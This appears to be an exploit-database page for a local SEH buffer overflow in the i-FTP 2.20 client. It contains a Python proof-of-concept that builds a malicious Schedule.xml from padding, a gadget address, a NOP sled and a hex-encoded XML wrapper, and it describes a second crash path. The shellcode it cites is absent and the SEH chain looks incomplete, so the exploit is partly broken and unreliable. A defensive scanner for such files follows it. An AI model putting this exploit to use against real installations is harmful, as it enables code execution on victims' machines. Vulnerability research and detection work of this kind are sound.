i-FTP 2.20 – Local Buffer Overflow (SEH)

  • Author: metacom
    Date: 2014-11-06
  • Category:
  • Source: https://www.exploit-db.com/exploits/35177/

```python
#!/usr/bin/python
# Exploit Title: i-FTP Buffer Overflow SEH
# Software Link: www.memecode.com/data/iftp-win32-v220.exe
# Version: i.Ftp v2.20 (Win32 Release)
# Vulnerability discovered: 26.10.2014
# Description: Simple portable cross platform FTP/SFTP/HTTP client.
# Tested on: Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN
# Exploit Author: metacom --> twitter.com/m3tac0m
# Python 2 script: the str literals below are raw bytes.
import struct

def little_endian(address):
    # Pack a 32-bit address as little-endian bytes.
    return struct.pack("<L", address)

poc  = "\x41" * 591                    # padding up to the SEH record
poc += little_endian(0x1004C31F)       # 1004C31F 5E POP ESI
poc += "\x90" * 80                     # NOP sled
# msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R
# | msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x20\x22" -t c
poc += "\x90" * (20000 - len(poc))     # pad the Time attribute to 20000 bytes

# Hex-encoded XML wrapper:
#   <?xml version="1.0" encoding="UTF-8" ?>\n<Schedule>\n\t<Event Url="" Time="http://\n
header  = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
#   " Folder="" />\n</Schedule>\n
footer  = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit = header + footer

filename = "Schedule.xml"
file = open(filename, "w")
file.write(exploit)    # write the crafted schedule to disk
file.close()
print "\n[*]Vulnerable Created Schedule.xml!"
print r"[*]Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp"
print "[*]Start IFTP"
print "[*]----------------------------------------------------"
print '''
[+]Second Vulnerability
[-]You can also enter the contents 20000 A of the file in the -->
 * HTTP -> HTTP Download --> Option "FILE" to cause this crash
 * Access violation - code c0000005 (!!! second chance !!!)
 * 0:003> !exchain
 * 016fff2c: 41414141
 * Invalid exception stack at 41414141'''
```
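A defensive counterpart, added here as an example and not part of the original advisory: a Python 3 scanner that checks an i.Ftp Schedule.xml for the kind of oversized or binary attribute value the PoC above plants in the Time attribute. The XML layout is taken from the decoded header/footer bytes of the PoC; the sample files, the attribute whitelist and the 256-byte limit are constructed assumptions. It deliberately avoids an XML parser, because a crafted file contains control and non-UTF-8 bytes that a parser would reject before anything could be reported.

```python
import re

# Constructed samples. BENIGN is a plausible schedule as i.Ftp writes it;
# MALICIOUS mirrors the PoC layout (padding, packed address, NOP sled).
BENIGN = (b'<?xml version="1.0" encoding="UTF-8" ?>\n<Schedule>\n'
          b'\t<Event Url="ftp://example.test/pub" Time="2014-11-06 10:00" '
          b'Folder="C:\\dl" />\n</Schedule>\n')
MALICIOUS = (b'<?xml version="1.0" encoding="UTF-8" ?>\n<Schedule>\n'
             b'\t<Event Url="" Time="http://\n' + b'A' * 591
             + b'\x1f\xc3\x04\x10' + b'\x90' * 80
             + b'" Folder="" />\n</Schedule>\n')

# Attributes of <Event> that hold user-controlled strings (assumption).
ATTR_RE = re.compile(rb'(Url|Time|Folder)="([^"]*)"')
MAX_LEN = 256  # assumption: no legitimate value approaches the 591-byte trigger
ALLOWED_CTRL = b'\t\r\n'


def scan_schedule(data):
    """Return a list of (attribute, length, reason) findings for raw file bytes."""
    findings = []
    for m in ATTR_RE.finditer(data):
        name, value = m.group(1).decode(), m.group(2)
        if len(value) > MAX_LEN:
            findings.append((name, len(value), "oversized"))
        # Control bytes (other than tab/CR/LF) and high bytes never appear in
        # a URL, timestamp or Windows path written by the client itself.
        if any((b < 0x20 and b not in ALLOWED_CTRL) or b >= 0x80 for b in value):
            findings.append((name, len(value), "non-printable bytes"))
    return findings


def is_suspicious(data):
    """True when the schedule should be quarantined rather than loaded."""
    return bool(scan_schedule(data))


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_schedule(sample))
```

Point it at the real file with `scan_schedule(open(path, "rb").read())`; the byte-level regex keeps working even when the file is not well-formed XML.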